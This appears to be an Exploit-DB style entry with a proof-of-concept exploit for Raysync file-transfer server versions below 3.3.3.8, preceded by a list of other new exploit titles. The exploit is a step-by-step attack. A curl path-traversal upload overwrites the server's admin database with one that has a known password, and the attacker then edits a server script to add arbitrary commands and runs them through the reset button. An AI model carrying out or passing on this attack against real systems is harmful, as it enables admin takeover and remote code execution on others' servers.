58ad270f64
6 changes to exploits/shellcodes Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption Adobe (Multiple Products) - XML Injection File Content Disclosure GitLab 11.4.7 - Remote Code Execution (Authenticated) Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting Raysync 3.3.3.8 - RCE Magic Home Pro 1.5.1 - Authentication Bypass PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection Seotoaster 3.2.0 - Stored XSS on Edit page properties
25 lines
No EOL
715 B
Text
25 lines
No EOL
715 B
Text
# Exploit Title: Raysync 3.3.3.8 - RCE
|
|
# Date: 04/10/2020
|
|
# Exploit Author: XiaoLong Zhu
|
|
# Vendor Homepage: www.raysync.io
|
|
# Version: below 3.3.3.8
|
|
# Tested on: Linux
|
|
|
|
step1: run RaysyncServer.sh to build a web application on the local
|
|
|
|
environment, set admin password to 123456 , which will be write to
|
|
|
|
manage.db file.
|
|
|
|
step2: curl "file=@manage.db" http://[raysync
|
|
ip]/avatar?account=1&UserId=/../../../../config/manager.db
|
|
|
|
to override remote manage.db file in server.
|
|
|
|
step3: login in admin portal with admin/123456.
|
|
|
|
step4: create a normal file with all permissions in scope.
|
|
|
|
step5: modify RaySyncServer.sh ,add arbitrary evil command.
|
|
|
|
step6: trigger rce with clicking "reset" button |